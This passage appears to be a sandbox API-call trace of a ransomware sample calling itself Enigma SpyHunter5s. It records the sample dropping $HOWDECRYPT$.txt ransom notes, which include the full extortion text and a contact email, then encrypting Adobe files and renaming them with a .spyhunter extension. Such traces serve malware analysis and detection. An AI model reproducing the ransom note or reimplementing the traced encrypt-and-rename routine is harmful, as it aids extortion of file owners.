wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ja_JP\\Reader_10.0.helpcfg.spyhunter") returned 89 [0179.800] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ja_JP\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\ja_jp\\reader_10.0.helpcfg"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ja_JP\\Reader_10.0.helpcfg.spyhunter" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\ja_jp\\reader_10.0.helpcfg.spyhunter")) returned 1 [0179.802] GetProcessHeap () returned 0x2c0000 [0179.802] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0179.802] GetProcessHeap () returned 0x2c0000 [0179.802] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0179.802] GetProcessHeap () returned 0x2c0000 [0179.802] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e752b8 | out: hHeap=0x2c0000) returned 1 [0179.802] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\it_IT\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\it_it\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0179.803] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0179.803] WriteFile (in: hFile=0x178, lpBuffer=0x57e207*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57e330, lpOverlapped=0x0 | out: lpBuffer=0x57e207*, lpNumberOfBytesWritten=0x57e330*=0x127, lpOverlapped=0x0) returned 1 [0179.804] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0179.804] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57e330, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57e330*=0x2ac, lpOverlapped=0x0) returned 1 [0179.804] CloseHandle (hObject=0x178) returned 1 [0179.806] GetProcessHeap () returned 0x2c0000 [0179.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e751d0 | out: hHeap=0x2c0000) returned 1 [0179.806] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e2d0 | out: pbBuffer=0x57e2d0) returned 1 [0179.806] GetProcessHeap () returned 0x2c0000 [0179.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0179.806] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e2c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e2c8*=0x30) returned 1 [0179.806] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\it_IT\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\it_it\\reader_10.0.helpcfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0179.807] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\it_IT\\Reader_10.0.helpcfg") returned 79 [0179.807] StrStrW (lpFirst="Reader_10.0.helpcfg", lpSrch=".txt") returned 0x0 [0179.807] GetProcessHeap () returned 0x2c0000 [0179.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0179.807] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e28c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57e28c*=0x15d, lpOverlapped=0x0) returned 1 [0179.808] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffea3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0179.808] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x15d, lpNumberOfBytesWritten=0x57e28c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57e28c*=0x15d, lpOverlapped=0x0) returned 1 [0179.808] GetProcessHeap () returned 0x2c0000 [0179.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0179.808] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.808] WriteFile (in: hFile=0x178, lpBuffer=0x57e2cc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e28c, lpOverlapped=0x0 | out: lpBuffer=0x57e2cc*, lpNumberOfBytesWritten=0x57e28c*=0x4, lpOverlapped=0x0) returned 1 [0179.808] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e28c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e28c*=0x30, lpOverlapped=0x0) returned 1 [0179.808] CloseHandle (hObject=0x178) returned 1 [0179.808] GetProcessHeap () returned 0x2c0000 [0179.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0179.808] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\it_IT\\Reader_10.0.helpcfg.spyhunter") returned 89 [0179.808] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\it_IT\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\it_it\\reader_10.0.helpcfg"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\it_IT\\Reader_10.0.helpcfg.spyhunter" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\it_it\\reader_10.0.helpcfg.spyhunter")) returned 1 [0179.809] GetProcessHeap () returned 0x2c0000 [0179.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0179.809] GetProcessHeap () returned 0x2c0000 [0179.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0179.809] GetProcessHeap () returned 0x2c0000 [0179.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e750e8 | out: hHeap=0x2c0000) returned 1 [0179.810] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hu_HU\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\hu_hu\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0179.810] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0179.810] WriteFile (in: hFile=0x178, lpBuffer=0x57e1ff*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57e328, lpOverlapped=0x0 | out: lpBuffer=0x57e1ff*, lpNumberOfBytesWritten=0x57e328*=0x127, lpOverlapped=0x0) returned 1 [0179.811] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0179.811] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57e328, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57e328*=0x2ac, lpOverlapped=0x0) returned 1 [0179.811] CloseHandle (hObject=0x178) returned 1 [0179.811] GetProcessHeap () returned 0x2c0000 [0179.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e75000 | out: hHeap=0x2c0000) returned 1 [0179.811] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e2c8 | out: pbBuffer=0x57e2c8) returned 1 [0179.811] GetProcessHeap () returned 0x2c0000 [0179.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0179.811] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e2c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e2c0*=0x30) returned 1 [0179.812] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hu_HU\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\hu_hu\\reader_10.0.helpcfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0179.812] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hu_HU\\Reader_10.0.helpcfg") returned 79 [0179.812] StrStrW (lpFirst="Reader_10.0.helpcfg", lpSrch=".txt") returned 0x0 [0179.812] GetProcessHeap () returned 0x2c0000 [0179.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0179.812] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e284, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57e284*=0x15d, lpOverlapped=0x0) returned 1 [0179.813] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffea3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0179.813] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x15d, lpNumberOfBytesWritten=0x57e284, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57e284*=0x15d, lpOverlapped=0x0) returned 1 [0179.813] GetProcessHeap () returned 0x2c0000 [0179.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0179.816] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.817] WriteFile (in: hFile=0x178, lpBuffer=0x57e2c4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e284, lpOverlapped=0x0 | out: lpBuffer=0x57e2c4*, lpNumberOfBytesWritten=0x57e284*=0x4, lpOverlapped=0x0) returned 1 [0179.817] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e284, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e284*=0x30, lpOverlapped=0x0) returned 1 [0179.817] CloseHandle (hObject=0x178) returned 1 [0179.818] GetProcessHeap () returned 0x2c0000 [0179.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0179.818] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hu_HU\\Reader_10.0.helpcfg.spyhunter") returned 89 [0179.818] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hu_HU\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\hu_hu\\reader_10.0.helpcfg"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hu_HU\\Reader_10.0.helpcfg.spyhunter" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\hu_hu\\reader_10.0.helpcfg.spyhunter")) returned 1 [0179.864] GetProcessHeap () returned 0x2c0000 [0179.864] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0179.864] GetProcessHeap () returned 0x2c0000 [0179.864] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0179.865] GetProcessHeap () returned 0x2c0000 [0179.865] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e74f18 | out: hHeap=0x2c0000) returned 1 [0179.887] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e2c0 | out: pbBuffer=0x57e2c0) returned 1 [0179.888] GetProcessHeap () returned 0x2c0000 [0179.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0179.888] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e2b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e2b8*=0x30) returned 1 [0179.888] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AcrobatUpdater.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\arm\\1.0\\acrobatupdater.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0179.888] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AcrobatUpdater.exe") returned 72 [0179.888] StrStrW (lpFirst="AcrobatUpdater.exe", lpSrch=".txt") returned 0x0 [0179.888] GetProcessHeap () returned 0x2c0000 [0179.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0179.889] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e27c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57e27c*=0x2800, lpOverlapped=0x0) returned 1 [0179.914] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0179.914] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e27c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57e27c*=0x2800, lpOverlapped=0x0) returned 1 [0179.914] GetProcessHeap () returned 0x2c0000 [0179.914] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0179.914] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.914] WriteFile (in: hFile=0x178, lpBuffer=0x57e2bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e27c, lpOverlapped=0x0 | out: lpBuffer=0x57e2bc*, lpNumberOfBytesWritten=0x57e27c*=0x4, lpOverlapped=0x0) returned 1 [0179.922] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e27c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e27c*=0x30, lpOverlapped=0x0) returned 1 [0179.922] CloseHandle (hObject=0x178) returned 1 [0179.932] GetProcessHeap () returned 0x2c0000 [0179.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0179.932] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AcrobatUpdater.exe.spyhunter") returned 82 [0179.932] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AcrobatUpdater.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\arm\\1.0\\acrobatupdater.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AcrobatUpdater.exe.spyhunter" (normalized: "c:\\program files (x86)\\common files\\adobe\\arm\\1.0\\acrobatupdater.exe.spyhunter")) returned 1 [0179.933] GetProcessHeap () returned 0x2c0000 [0179.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0179.933] GetProcessHeap () returned 0x2c0000 [0179.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0179.933] GetProcessHeap () returned 0x2c0000 [0179.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e66880 | out: hHeap=0x2c0000) returned 1 [0179.933] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e2c0 | out: pbBuffer=0x57e2c0) returned 1 [0179.933] GetProcessHeap () returned 0x2c0000 [0179.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0179.933] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e2b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e2b8*=0x30) returned 1 [0179.933] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.ITA" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.ita"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.935] GetProcessHeap () returned 0x2c0000 [0179.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0179.935] GetProcessHeap () returned 0x2c0000 [0179.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e65b60 | out: hHeap=0x2c0000) returned 1 [0179.935] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e2b8 | out: pbBuffer=0x57e2b8) returned 1 [0179.935] GetProcessHeap () returned 0x2c0000 [0179.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0179.935] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e2b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e2b0*=0x30) returned 1 [0179.935] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.HUN" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.hun"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.937] GetProcessHeap () returned 0x2c0000 [0179.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0179.937] GetProcessHeap () returned 0x2c0000 [0179.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e65a80 | out: hHeap=0x2c0000) returned 1 [0179.937] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e2b8 | out: pbBuffer=0x57e2b8) returned 1 [0179.937] GetProcessHeap () returned 0x2c0000 [0179.937] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0179.938] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e2b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e2b0*=0x30) returned 1 [0179.938] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.HRV" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.hrv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.939] GetProcessHeap () returned 0x2c0000 [0179.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0179.939] GetProcessHeap () returned 0x2c0000 [0179.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e659a0 | out: hHeap=0x2c0000) returned 1 [0179.939] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e2b0 | out: pbBuffer=0x57e2b0) returned 1 [0179.939] GetProcessHeap () returned 0x2c0000 [0179.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0179.940] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e2a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e2a8*=0x30) returned 1 [0179.940] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.FRA" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.fra"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.941] GetProcessHeap () returned 0x2c0000 [0179.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0179.941] GetProcessHeap () returned 0x2c0000 [0179.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e658c0 | out: hHeap=0x2c0000) returned 1 [0179.941] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e2b0 | out: pbBuffer=0x57e2b0) returned 1 [0179.941] GetProcessHeap () returned 0x2c0000 [0179.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0179.941] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e2a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e2a8*=0x30) returned 1 [0179.941] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.EUQ" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.euq"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.943] GetProcessHeap () returned 0x2c0000 [0179.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0179.943] GetProcessHeap () returned 0x2c0000 [0179.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e657e0 | out: hHeap=0x2c0000) returned 1 [0179.943] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e2a8 | out: pbBuffer=0x57e2a8) returned 1 [0179.943] GetProcessHeap () returned 0x2c0000 [0179.943] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0179.943] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e2a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e2a0*=0x30) returned 1 [0179.944] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.ESP" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.esp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.945] GetProcessHeap () returned 0x2c0000 [0179.945] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0179.945] GetProcessHeap () returned 0x2c0000 [0179.945] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e65700 | out: hHeap=0x2c0000) returned 1 [0179.945] 